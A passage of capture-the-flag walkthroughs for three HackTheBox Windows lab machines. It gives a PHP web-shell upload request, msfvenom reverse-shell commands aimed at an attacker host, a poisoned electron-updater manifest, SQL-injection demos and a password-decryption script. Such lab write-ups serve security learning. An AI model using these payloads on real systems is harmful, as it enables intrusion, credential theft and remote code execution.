HTB_Windows_Set_0

The more knowledge you drink, the more thirsty you are.

Love

Port scanning

nmap -sV -sT -Pn 10.10.10.239

Nmap scan report for 10.10.10.239
Host is up (0.87s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=6/9%Time=60C04557%P=x86_64-pc-linux-gnu%r(NUL
SF:L,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed
SF:\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines,4
SF:9,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(HTTPOptions,49,"E
SF:\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\
SF:x20connect\x20to\x20this\x20MariaDB\x20server")%r(RPCCheck,49,"E\0\0\x0
SF:1\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20conn
SF:ect\x20to\x20this\x20MariaDB\x20server")%r(DNSStatusRequestTCP,49,"E\0\
SF:0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20
SF:connect\x20to\x20this\x20MariaDB\x20server")%r(TerminalServerCookie,49,
SF:"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20t
SF:o\x20connect\x20to\x20this\x20MariaDB\x20server")%r(Kerberos,49,"E\0\0\
SF:x01\xffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20co
SF:nnect\x20to\x20this\x20MariaDB\x20server")%r(X11Probe,49,"E\0\0\x01\xff
SF:j\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(FourOhFourRequest,49,"E\0\0\x01\x
SF:ffj\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect
SF:\x20to\x20this\x20MariaDB\x20server")%r(LDAPSearchReq,49,"E\0\0\x01\xff
SF:j\x04Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x
SF:20to\x20this\x20MariaDB\x20server")%r(LDAPBindReq,49,"E\0\0\x01\xffj\x0
SF:4Host\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x20to
SF:\x20this\x20MariaDB\x20server")%r(SIPOptions,49,"E\0\0\x01\xffj\x04Host
SF:\x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20t
SF:his\x20MariaDB\x20server")%r(TerminalServer,49,"E\0\0\x01\xffj\x04Host\
SF:x20'10\.10\.16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20th
SF:is\x20MariaDB\x20server")%r(NCP,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.
SF:16\.2'\x20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaD
SF:B\x20server")%r(JavaRMI,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.2'\x
SF:20is\x20not\x20allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20ser
SF:ver");
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows
nmap -A -p 443 10.10.10.239

Nmap scan report for 10.10.10.239
Host is up (0.75s latency).

PORT STATE SERVICE VERSION
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows 10 1709 - 1909 (95%), Microsoft Windows Longhorn (95%), Microsoft Windows 10 1703 (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows 7 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 10 1709 - 1803 (93%), Microsoft Windows 10 1809 - 1909 (93%), Microsoft Windows 10 1511 (92%), Microsoft Windows Server 2008 SP2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: www.example.com, www.love.htb

The host name staging.love.htb only shows up in a more thorough scan of the TLS port: it is the commonName of the certificate.
Requesting port 443 without that Host header returns 403.
Port 5000 returns 403 outright from the outside.

Exploitation

Visiting port 443 with that host name reveals a file-read (LFI) flaw: the page fetches a user-supplied URL, so a file:// URL reads local files. Reading the application source this way:

<?php
#C:\xampp\htdocs\omrs\login.php
session_start();
include 'includes/conn.php';

if(isset($_POST['login'])){
    $voter = $_POST['voter'];
    $password = $_POST['password'];

    // voter ID is interpolated straight into the query: SQL injection
    $sql = "SELECT * FROM voters WHERE voters_id = '$voter'";
    $query = $conn->query($sql);

    if($query->num_rows < 1){
        $_SESSION['error'] = 'Cannot find voter with the ID';
    }
    else{
        $row = $query->fetch_assoc();
        // the password is still checked against the bcrypt hash of the returned row
        if(password_verify($password, $row['password'])){
            $_SESSION['voter'] = $row['id'];
        }
        else{
            $_SESSION['error'] = 'Incorrect password';
        }
    }

}
else{
    $_SESSION['error'] = 'Input voter credentials first';
}

header('location: index.php');

?>
<?php
#C:\xampp\htdocs\omrs\admin\includes\conn.php
// root with an empty password, and the same database for voters and admins
$conn = new mysqli('localhost', 'root', '', 'votesystem');

if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

?>
<?php
#C:\xampp\htdocs\omrs\admin\login.php
session_start();
include 'includes/conn.php';

if(isset($_POST['login'])){
    $username = $_POST['username'];
    $password = $_POST['password'];

    // username is interpolated straight into the query: SQL injection
    $sql = "SELECT * FROM admin WHERE username = '$username'";
    $query = $conn->query($sql);

    if($query->num_rows < 1){
        $_SESSION['error'] = 'Cannot find account with the username';
    }
    else{
        $row = $query->fetch_assoc();
        if(password_verify($password, $row['password'])){
            $_SESSION['admin'] = $row['id'];
        }
        else{
            $_SESSION['error'] = 'Incorrect password';
        }
    }

}
else{
    $_SESSION['error'] = 'Input admin credentials first';
}

header('location: index.php');

?>

The SQL injection is obvious: the voters_id / username value is concatenated straight into the query. The password, however, is checked afterwards with password_verify() against the bcrypt hash in the returned row, so a plain ' OR 1=1 bypass only finds the row; it does not log you in.
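As an added example (not code from this write-up or from the voting application), the Python below models the two login handlers above with sqlite3 standing in for MariaDB and PBKDF2 standing in for bcrypt's password_hash()/password_verify() (bcrypt is not in the standard library). It shows the point that matters on this box: an ' OR 1=1 injection finds the admin row but still fails the hash check, whereas a UNION that returns an attacker-chosen hash passes it, and a bound parameter stops both. The table, the hash and the payloads are constructed for the demo; sqlite's comment marker is "-- " where MariaDB would take "#".

```python
#!/usr/bin/env python3
"""Model of the two login.php handlers above, with sqlite3 in place of MariaDB
and PBKDF2 in place of bcrypt (stand-ins, not the application's own code)."""
import hashlib
import hmac
import os
import sqlite3
from typing import Optional

ITERATIONS = 50_000  # slow on purpose, like bcrypt's cost factor


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Stand-in for PHP password_hash(): salted, slow, stored as salthex$digesthex."""
    salt = salt or os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password: str, stored: str) -> bool:
    """Stand-in for PHP password_verify(): recompute with the stored salt."""
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                 bytes.fromhex(salt_hex), ITERATIONS)
    return hmac.compare_digest(digest.hex(), digest_hex)


def make_db() -> sqlite3.Connection:
    """Constructed sample table with the dumped admin schema (id, username, password)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO admin VALUES (1, 'admin', ?)",
                 (hash_password("real-admin-secret"),))
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Mirrors admin/login.php: the username is interpolated into the SQL."""
    sql = f"SELECT * FROM admin WHERE username = '{username}'"
    row = conn.execute(sql).fetchone()
    if row is None:
        return False                             # 'Cannot find account with the username'
    return verify_password(password, row[2])     # the hash check still happens


def login_fixed(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Same flow with a bound parameter: input can no longer change the query."""
    row = conn.execute("SELECT * FROM admin WHERE username = ?", (username,)).fetchone()
    return row is not None and verify_password(password, row[2])


def union_payload(chosen_password: str) -> str:
    """Injection that makes the SELECT return a row whose hash the attacker chose,
    so the hash check succeeds with chosen_password. Constructed for the demo."""
    forged_hash = hash_password(chosen_password)
    return f"' UNION SELECT 1, 'admin', '{forged_hash}' -- "


if __name__ == "__main__":
    db = make_db()
    print("OR 1=1 bypass logs in:", login_vulnerable(db, "' OR 1=1 -- ", "anything"))
    print("UNION with own hash logs in:",
          login_vulnerable(db, union_payload("letmein"), "letmein"))
    print("same payload, fixed query:",
          login_fixed(db, union_payload("letmein"), "letmein"))
```

The OR-bypass returns the real admin row, and without the real password the verify step fails; that is exactly why the write-up ends up dumping and cracking the hash. The UNION variant sidesteps the hash entirely, which is the reason a parameterised lookup, not the hash check, is the control that matters.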

sqlmap -u "http://10.10.10.239/login.php" --data "voter=123&password=321&login=" --dbs
available databases [6]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] votesystem

sqlmap -u "http://10.10.10.239/admin/login.php" --data "username=123&password=321&login=" -D votesystem --tables
Database: votesystem
[5 tables]
+------------+
| admin |
| candidates |
| positions |
| voters |
| votes |
+------------+

sqlmap -u "http://10.10.10.239/admin/login.php" --data "username=123&password=321&login=" -D votesystem -T admin --columns
Database: votesystem
Table: admin
[7 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| created_on | date |
| firstname | varchar(50) |
| id | int(11) |
| lastname | varchar(50) |
| password | varchar(60) |
| photo | varchar(150) |
| username | varchar(50) |
+------------+--------------+

sqlmap -u "http://10.10.10.239/admin/login.php" --data "username=123&password=321&login=" -D votesystem -T admin -C username,password --dump
Database: votesystem
Table: admin
[1 entry]
+----------+--------------------------------------------------------------+
| username | password |
+----------+--------------------------------------------------------------+
| admin | $2y$10$4E3VVe2PWlTMejquTmMD6.Og9RmmFN.K5A1n99kHNdQxHePutFjsC |
+----------+--------------------------------------------------------------+

sqlmap -u "http://10.10.10.239/admin/login.php" --data "username=123&password=321&login=" -D votesystem -T voters --columns
Database: votesystem
Table: voters
[6 columns]
+-----------+--------------+
| Column | Type |
+-----------+--------------+
| firstname | varchar(30) |
| id | int(11) |
| lastname | varchar(30) |
| password | varchar(60) |
| photo | varchar(150) |
| voters_id | varchar(15) |
+-----------+--------------+


sqlmap -u "http://10.10.10.239/admin/login.php" --data "username=123&password=321&login=" -D votesystem -T voters -C voters_id,password --dump
+-----------+----------+
| voters_id | password |
+-----------+----------+
+-----------+----------+

Cracking the hash is far too slow here, though: bcrypt ($2y$10$) is deliberately expensive, orders of magnitude more so than MD5.

After a look at someone else's write-up: the URL-fetch feature on port 443 can be pointed at local port 5000, which is forbidden from the outside, and that page hands out the login credentials:
admin:@LoveIsInTheAir!!!!
I had been attacking this box with the usual pentest routine and did not expect a twist like this.
After logging into the admin panel, upload a shell through the voter photo field, which accepts a .php file:

POST /admin/voters_add.php HTTP/1.1

Host: 10.10.10.239
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------7586397232801671174932942436
Content-Length: 696
Origin: http://10.10.10.239
Connection: close
Referer: http://10.10.10.239/admin/voters.php
Cookie: PHPSESSID=uofg65u57tbm4rp6jbn0359660
Upgrade-Insecure-Requests: 1

-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="firstname"

1
-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="lastname"

2
-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="password"

333
-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="photo"; filename="shell.php"
Content-Type: image/jpeg

<?php eval($_POST["cmd"]);?>

-----------------------------7586397232801671174932942436
Content-Disposition: form-data; name="add"


-----------------------------7586397232801671174932942436--

Upload nc with AntSword (蚁剑) and spawn a reverse shell.

type c:\users\phoebe\desktop\user.txt
fc8833cab6af6700441328fd2a4ecc04

Privilege escalation

AlwaysInstallElevated is set. When the AlwaysInstallElevated registry value is 1 under both HKCU and HKLM, Windows Installer installs any MSI package with SYSTEM privileges, so a malicious MSI is enough to escalate. Both values must be 1; one of them alone is not exploitable.
https://zhuanlan.zhihu.com/p/375373404

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer

HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1

Generating a reverse shell as an MSI with msfvenom (-f msi) and installing it with msiexec is enough; the shell comes back as SYSTEM.

type c:\users\administrator\desktop\root.txt
a0f54f7853efdefe4c8cef97186db4c8

msfvenom & nc

On the principle of not using Metasploit when it can be avoided, I did not use meterpreter.
Payloads marked (staged) in the msfvenom listing cannot be caught with a bare nc listener, though.
In the end windows/x64/shell/reverse_tcp was used.
Note the naming: windows/x64/shell/reverse_tcp (with the slash) is the staged payload and needs a Metasploit handler to deliver the second stage; windows/x64/shell_reverse_tcp (with the underscore) is the stageless variant that nc can catch on its own.


Atom

Port scanning

nmap -sV -sT -Pn 10.10.10.237

Nmap scan report for 10.10.10.237
Host is up (0.30s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Exploitation

smbclient -L 10.10.10.237

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
Software_Updates Disk
SMB1 disabled -- no workgroup available
smbclient \\\\10.10.10.237\\software_updates

smb: \> dir
. D 0 Fri Jun 11 11:18:21 2021
.. D 0 Fri Jun 11 11:18:21 2021
client1 D 0 Fri Jun 11 11:18:21 2021
client3 D 0 Fri Jun 11 11:18:21 2021
UAT_Testing_Procedures.pdf A 35202 Fri Apr 9 19:18:08 2021
4413951 blocks of size 4096. 1381036 blocks available
smb: \> get UAT_Testing_Procedures.pdf
getting file \UAT_Testing_Procedures.pdf of size 35202 as UAT_Testing_Procedures.pdf (6.3 KiloBytes/sec) (average 6.3 KiloBytes/sec)

The PDF describes the software under test: "Note taking application built with electron-builder which helps users in taking important notes."

A search for electron-builder turns up an RCE in its updater: on Windows, electron-updater's signature verification could be bypassed with a crafted file name, so a poisoned update manifest gets the application to download and run an attacker's executable.

https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html

Build the payload (the single quote in the file name is the trigger for the signature bypass):

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.3 LPORT=9996 -f exe > s\'hell.exe

cat latest.yml
version: 1.2.3
path: http://10.10.16.3:9999/s'hell.exe
sha512: pyfnrQs40RwrwKOWykgeZ0PKeSudGkN1UI/9j+PpxG4M42uY88j/hNAx7xWonk57X0GMdPIOma9FsfeBglTLMQ==

Start an HTTP server to serve the executable:

python3 -m http.server 9999

Upload latest.yml into the client* folders on the share; the client checks them for updates, fetches the executable named in path and runs it.
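As an added example (not the write-up's own code and not part of electron-builder), the Python below assembles the latest.yml the updater reads, with the sha512 field in the format electron-updater compares: base64 of the raw SHA-512 digest, not hex. The payload bytes, host, port and version are constructed stand-ins for the msfvenom executable above. The single quote in the file name is the part that matters for the signature bypass in the Doyensec post; the checksum is computed by the attacker over the attacker's own file, so a matching checksum proves nothing about trust.

```python
#!/usr/bin/env python3
"""Build the update manifest electron-updater reads (added example; constructed
payload bytes stand in for the msfvenom executable above)."""
import base64
import hashlib


def electron_sha512(data: bytes) -> str:
    """electron-builder writes sha512 as base64 of the raw digest, not hex."""
    return base64.b64encode(hashlib.sha512(data).digest()).decode("ascii")


def build_latest_yml(version: str, url: str, payload: bytes) -> str:
    """Flat latest.yml with the three keys used in the write-up above."""
    fields = {"version": version, "path": url, "sha512": electron_sha512(payload)}
    return "".join(f"{key}: {value}\n" for key, value in fields.items())


def parse_latest_yml(text: str) -> dict:
    """Minimal reader for the flat key: value lines (no PyYAML needed)."""
    manifest = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            manifest[key.strip()] = value.strip()
    return manifest


def checksum_matches(payload: bytes, manifest: dict) -> bool:
    """The check the updater performs on the downloaded file. It only proves the
    file is the one whose digest is in the manifest, and the attacker wrote both."""
    return manifest.get("sha512") == electron_sha512(payload)


# Constructed stand-in for s'hell.exe; a real payload would be the msfvenom output.
PAYLOAD = b"MZ" + bytes(62) + b"constructed stand-in for s'hell.exe"
# Illustrative attacker host/port; the quote in the file name is the trigger.
MANIFEST = build_latest_yml("1.2.3", "http://10.10.16.3:9999/s'hell.exe", PAYLOAD)

if __name__ == "__main__":
    print(MANIFEST, end="")
```

The version must be higher than the one the client has installed, otherwise it never fetches the file; the write-up uses 1.2.3 for that reason.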

type c:\users\jason\desktop\user.txt
3eda0e1bce259d8ffd4c1994f84bfdea

Privilege escalation

type c:\"program files"\redis\redis.windows.conf
requirepass kidvscat_yes_kidvscat
redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat

keys *
1) "pk:ids:User"
2) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
3) "pk:ids:MetaDataClass"
4) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"

get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
dir c:\users\jason\downloads\

d----- 4/2/2021 8:21 PM PortableKanban

PortableKanban has a known password-recovery weakness: the stored password is DES-encrypted with a key and IV hard-coded in the application, so the EncryptedPassword value pulled from Redis decrypts offline.

#!/usr/bin/env python3
# Decrypt the PortableKanban EncryptedPassword field. The application uses
# DES-CBC with a key and IV hard-coded in its binary; both are the same for
# every install, which is why the value from Redis decrypts offline.
import base64
from des import DesKey          # python3 -m pip install des

KEY = b"7ly6UznJ"               # hard-coded DES key
IV = b"XuVUm5fR"                # hard-coded IV


def decode(encrypted: str) -> str:
    ciphertext = base64.b64decode(encrypted)
    return DesKey(KEY).decrypt(ciphertext, initial=IV, padding=True).decode("utf-8")


print(decode("Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi"))

This gives kidvscat_admin_@123.

Log in with evil-winrm.

type c:\users\administrator\desktop\root.txt
2b36cf6bd3cd95fc37d6e2f81e80163b

This privilege-escalation part is quite a stretch...


Breadcrumbs

Port scanning

nmap -sV -sT -Pn 10.10.10.228

Nmap scan report for 10.10.10.228
Host is up (0.38s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE        VERSION
22/tcp   open     ssh            OpenSSH for_Windows_7.7 (protocol 2.0)
80/tcp   open     http           Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
135/tcp  open     msrpc          Microsoft Windows RPC
139/tcp  open     netbios-ssn    Microsoft Windows netbios-ssn
443/tcp  open     ssl/http       Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1h PHP/8.0.1)
445/tcp  open     microsoft-ds?
1107/tcp filtered isoipsigport-2
3306/tcp open     mysql?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=6/11%Time=60C2E951%P=x86_64-pc-linux-gnu%r(NU
SF:LL,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.3'\x20is\x20not\x20allowe
SF:d\x20to\x20connect\x20to\x20this\x20MariaDB\x20server")%r(GenericLines,
SF:49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.16\.3'\x20is\x20not\x20allowed\x
SF:20to\x20connect\x20to\x20this\x20MariaDB\x20server");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Directory scanning

dirb http://10.10.10.228/

---- Scanning URL: http://10.10.10.228/ ----
+ http://10.10.10.228/aux (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/books/
==> DIRECTORY: http://10.10.10.228/Books/
+ http://10.10.10.228/cgi-bin/ (CODE:403|SIZE:301)
+ http://10.10.10.228/com1 (CODE:403|SIZE:301)
+ http://10.10.10.228/com2 (CODE:403|SIZE:301)
+ http://10.10.10.228/com3 (CODE:403|SIZE:301)
+ http://10.10.10.228/con (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/css/
==> DIRECTORY: http://10.10.10.228/db/
==> DIRECTORY: http://10.10.10.228/DB/
+ http://10.10.10.228/examples (CODE:503|SIZE:401)
==> DIRECTORY: http://10.10.10.228/includes/
+ http://10.10.10.228/index.php (CODE:200|SIZE:2368)
==> DIRECTORY: http://10.10.10.228/js/
+ http://10.10.10.228/licenses (CODE:403|SIZE:420)
+ http://10.10.10.228/lpt1 (CODE:403|SIZE:301)
+ http://10.10.10.228/lpt2 (CODE:403|SIZE:301)
+ http://10.10.10.228/nul (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/php/
==> DIRECTORY: http://10.10.10.228/PHP/
+ http://10.10.10.228/phpmyadmin (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/portal/
+ http://10.10.10.228/prn (CODE:403|SIZE:301)
+ http://10.10.10.228/server-info (CODE:403|SIZE:420)
+ http://10.10.10.228/server-status (CODE:403|SIZE:420)
+ http://10.10.10.228/webalizer (CODE:403|SIZE:301)

---- Entering directory: http://10.10.10.228/portal/ ----
==> DIRECTORY: http://10.10.10.228/portal/assets/
+ http://10.10.10.228/portal/aux (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/com1 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/com2 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/com3 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/con (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/portal/db/
==> DIRECTORY: http://10.10.10.228/portal/DB/

==> DIRECTORY: http://10.10.10.228/portal/includes/
+ http://10.10.10.228/portal/index.php (CODE:302|SIZE:0)
+ http://10.10.10.228/portal/lpt1 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/lpt2 (CODE:403|SIZE:301)
+ http://10.10.10.228/portal/nul (CODE:403|SIZE:301)
==> DIRECTORY: http://10.10.10.228/portal/php/
==> DIRECTORY: http://10.10.10.228/portal/PHP/

+ http://10.10.10.228/portal/prn (CODE:403|SIZE:301)

==> DIRECTORY: http://10.10.10.228/portal/uploads/
==> DIRECTORY: http://10.10.10.228/portal/vendor/
-----------------
END_TIME: Sat Jun 12 13:42:20 2021
DOWNLOADED: 9224 - FOUND: 27

Exploitation

Visit /php/books.php and watch the requests it makes:

POST /includes/bookController.php HTTP/1.1

title=a&author=&method=0
POST /includes/bookController.php HTTP/1.1

book=book7.html&method=1

Two kinds of POST request go to /includes/bookController.php.
The second one has an LFI: the book parameter is appended to ../books/ and handed to file_get_contents(), as the error shows when it is left empty:

Warning:  file_get_contents(../books/): Failed to open stream: No such file or directory in C:\Users\www-data\Desktop\xampp\htdocs\includes\bookController.php on line 28
false

Apache also has directory listing enabled (note the many DIRECTORY hits in the dirb output), so file names can be enumerated and then read through the LFI with ../ traversal:

  • /portal/authController.php
<?php
require 'db/db.php';
require "cookie.php";
require "vendor/autoload.php";
use \Firebase\JWT\JWT;

$errors = array();
$username = "";
$userdata = array();
$valid = false;
$IP = $_SERVER['REMOTE_ADDR'];

//if user clicks on login
if($_SERVER['REQUEST_METHOD'] === "POST"){
    if($_POST['method'] == 0){
        $username = $_POST['username'];
        $password = $_POST['password'];

        $query = "SELECT username,position FROM users WHERE username=? LIMIT 1";
        $stmt = $con->prepare($query);
        $stmt->bind_param('s', $username);
        $stmt->execute();
        $result = $stmt->get_result();
        while ($row = $result->fetch_array(MYSQLI_ASSOC)){
            array_push($userdata, $row);
        }
        $userCount = $result->num_rows;
        $stmt->close();

        if($userCount > 0){
            $password = sha1($password);
            $passwordQuery = "SELECT * FROM users WHERE password=? AND username=? LIMIT 1";
            $stmt = $con->prepare($passwordQuery);
            $stmt->bind_param('ss', $password, $username);
            $stmt->execute();
            $result = $stmt->get_result();

            if($result->num_rows > 0){
                $valid = true;
            }
            $stmt->close();
        }

        if($valid){
            session_id(makesession($username));
            session_start();

            // hard-coded signing key: anyone who can read this file can mint tokens
            $secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';
            $data = array();

            $payload = array(
                "data" => array(
                    "username" => $username
                ));

            $jwt = JWT::encode($payload, $secret_key, 'HS256');

            setcookie("token", $jwt, time() + (86400 * 30), "/");

            $_SESSION['username'] = $username;
            $_SESSION['loggedIn'] = true;
            if($userdata[0]['position'] == ""){
                $_SESSION['role'] = "Awaiting approval";
            }
            else{
                $_SESSION['role'] = $userdata[0]['position'];
            }

            header("Location: /portal");
        }

        else{
            $_SESSION['loggedIn'] = false;
            $errors['valid'] = "Username or Password incorrect";
        }
    }

    elseif($_POST['method'] == 1){
        $username=$_POST['username'];
        $password=$_POST['password'];
        $passwordConf=$_POST['passwordConf'];

        if(empty($username)){
            $errors['username'] = "Username Required";
        }
        if(strlen($username) < 4){
            $errors['username'] = "Username must be at least 4 characters long";
        }
        if(empty($password)){
            $errors['password'] = "Password Required";
        }
        if($password !== $passwordConf){
            $errors['passwordConf'] = "Passwords don't match!";
        }

        $userQuery = "SELECT * FROM users WHERE username=? LIMIT 1";
        $stmt = $con->prepare($userQuery);
        $stmt ->bind_param('s',$username);
        $stmt->execute();
        $result = $stmt->get_result();
        $userCount = $result->num_rows;
        $stmt->close();

        if($userCount > 0){
            $errors['username'] = "Username already exists";
        }

        if(count($errors) === 0){
            $password = sha1($password);
            $sql = "INSERT INTO users(username, password, age, position) VALUES (?,?, 0, '')";
            $stmt = $con->prepare($sql);
            $stmt ->bind_param('ss', $username, $password);

            if ($stmt->execute()){
                $user_id = $con->insert_id;
                header('Location: login.php');
            }
            else{
                $_SESSION['loggedIn'] = false;
                $errors['db_error']="Database error: failed to register";
            }
        }
    }
}
  • /portal/cookie.php
<?php
/**
* @param string $username Username requesting session cookie
*
* @return string $session_cookie Returns the generated cookie
*
* @devteam
* Please DO NOT use default PHPSESSID; our security team says they are predictable.
* CHANGE SECOND PART OF MD5 KEY EVERY WEEK
* */
function makesession($username){
    // the only randomness is which character of the username is used,
    // so there are at most strlen($username) possible session IDs per user
    $max = strlen($username) - 1;
    $seed = rand(0, $max);
    $key = "s4lTy_stR1nG_".$username[$seed]."(!528.\/9890";
    $session_cookie = $username.md5($key);

    return $session_cookie;
}
  • /portal/includes/fileController.php
<?php
$ret = "";
require "../vendor/autoload.php";
use \Firebase\JWT\JWT;
session_start();

function validate(){
    $ret = false;
    $jwt = $_COOKIE['token'];

    // same hard-coded key as authController.php
    $secret_key = '6cb9c1a2786a483ca5e44571dcc5f3bfa298593a6376ad92185c3258acd5591e';
    $ret = JWT::decode($jwt, $secret_key, array('HS256'));
    return $ret;
}

if($_SERVER['REQUEST_METHOD'] === "POST"){
    $admins = array("paul");
    $user = validate()->data->username;
    // both the JWT and the PHP session must say "paul"
    if(in_array($user, $admins) && $_SESSION['username'] == "paul"){
        error_reporting(E_ALL & ~E_NOTICE);
        $uploads_dir = '../uploads';
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_POST['task'];   // file name on disk comes from the task field

        if(move_uploaded_file($tmp_name, "$uploads_dir/$name")){
            $ret = "Success. Have a great weekend!";
        }
        else{
            $ret = "Missing file or title :(" ;
        }
    }
    else{
